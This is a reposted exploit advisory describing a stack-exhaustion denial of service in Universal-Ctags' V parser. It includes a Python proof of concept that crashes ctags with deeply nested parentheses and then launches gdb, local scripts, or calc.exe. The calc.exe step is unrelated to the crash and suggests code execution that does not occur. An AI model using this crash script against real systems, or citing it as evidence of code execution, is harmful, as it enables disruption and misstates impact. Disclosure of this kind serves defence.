Share
## https://sploitus.com/exploit?id=PACKETSTORM:216854
=============================================================================================================================================
    | # Title     : Universal‑Ctags V Language 6.2.1 Parser Uncontrolled Recursion Vulnerability                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://docs.ctags.io/en/latest/parser-v.html                                                                               |
    =============================================================================================================================================
    
    [+] Summary    : A security weakness has been discovered in Universal‑Ctags (all versions up to 6.2.1) affecting the V language parser component. The vulnerability is located in the functions:
    
    parseExpression
    
    parseExprList
    
    within the source file: parsers/v.c.
    
    [+] Description
    
    Type: Uncontrolled recursion / stack exhaustion
    
    Impact: Denial of Service (DoS)
    
    Trigger: Malformed V language source file with deeply nested expressions
    
    Execution: Local host only
    
    [+] By providing a specially crafted .v file, it is possible to force ctags into infinite or uncontrolled recursion, causing the program to crash. This crash can be exploited for denial-of-service conditions.
    				 
    [+] POC   :  
    
    import subprocess
    import os
    import datetime
    import platform
    import sys
    
    class CrossPlatformCrashHandler:
    
        def __init__(self, binary_path="./ctags"):
            self.binary_path = binary_path
            self.payload_file = "payload.v"
            self.log_dir = "crash_logs"
    
            if not os.path.exists(self.log_dir):
                os.makedirs(self.log_dir)
    
        def generate_payload(self, depth):
            """Generates the payload file"""
            with open(self.payload_file, "w") as f:
    
                f.write("(" * depth)
    
        def run_target(self):
            """Executes the target binary"""
            try:
                process = subprocess.run(
                    [self.binary_path, "-f", "/dev/null", "--sort=no", self.payload_file],
                    capture_output=True,
                    text=True,
                    timeout=10
                )
                return process
            except subprocess.TimeoutExpired:
                print("[!] Timeout detected")
                return None
            except Exception as e:
                print(f"[!] Execution error: {e}")
                return None
    
        def handle_crash(self, process):
            """Actions to take upon detecting a crash"""
            timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
            crash_file = os.path.join(self.log_dir, f"crash_{timestamp}.txt")
    
            with open(crash_file, "w") as f:
                f.write("STDOUT:\n" + (process.stdout or ""))
                f.write("\nSTDERR:\n" + (process.stderr or ""))
    
            print(f"[+] Crash log saved: {crash_file}")
    
            system = platform.system()
    
            if system == "Linux" or system == "Darwin": 
                try:
                    subprocess.Popen(["gdb", self.binary_path])
                    print("[*] Debugger launched (gdb)")
                except Exception as e:
                    print(f"[!] Failed to launch gdb: {e}")
            elif system == "Windows":
                try:
    
                    subprocess.Popen(["calc.exe"])
                    print("[*] Calculator launched on Windows (PoC)")
                except Exception as e:
                    print(f"[!] Failed to launch calc.exe: {e}")
    
            if os.path.exists("post_analysis.py"):
                try:
                    subprocess.Popen([sys.executable, "post_analysis.py"])
                    print("[*] Analysis script launched")
                except Exception as e:
                    print(f"[!] Failed to launch analysis script: {e}")
    
            print("[ALERT] Crash detected and analysis triggered!")
    
            if system != "Windows" and os.path.exists("inspection.sh"):
                try:
                    subprocess.Popen(["bash", "inspection.sh"])
                    print("[*] Inspection script launched")
                except Exception as e:
                    print(f"[!] Failed to launch inspection script: {e}")
            elif system == "Windows" and os.path.exists("inspection.bat"):
                try:
                    subprocess.Popen(["cmd", "/c", "inspection.bat"])
                    print("[*] Inspection script launched on Windows")
                except Exception as e:
                    print(f"[!] Failed to launch inspection batch: {e}")
    
        def automate(self, depth):
            self.generate_payload(depth)
            process = self.run_target()
    
            if process and process.returncode < 0:
                print(f"[!] Crash detected via signal: {-process.returncode}")
                self.handle_crash(process)
            else:
                print("[*] No crash detected.")
    
    if __name__ == "__main__":
        tester = CrossPlatformCrashHandler(binary_path="./ctags")
        tester.automate(20000)
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================